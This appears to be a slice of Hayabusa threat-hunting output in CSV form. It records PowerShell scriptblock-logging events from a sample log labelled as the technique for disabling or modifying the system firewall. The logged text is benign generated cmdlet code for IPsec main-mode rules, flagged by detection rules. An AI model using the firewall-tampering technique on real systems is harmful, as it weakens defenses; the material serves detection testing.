Scriptblock Log,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] 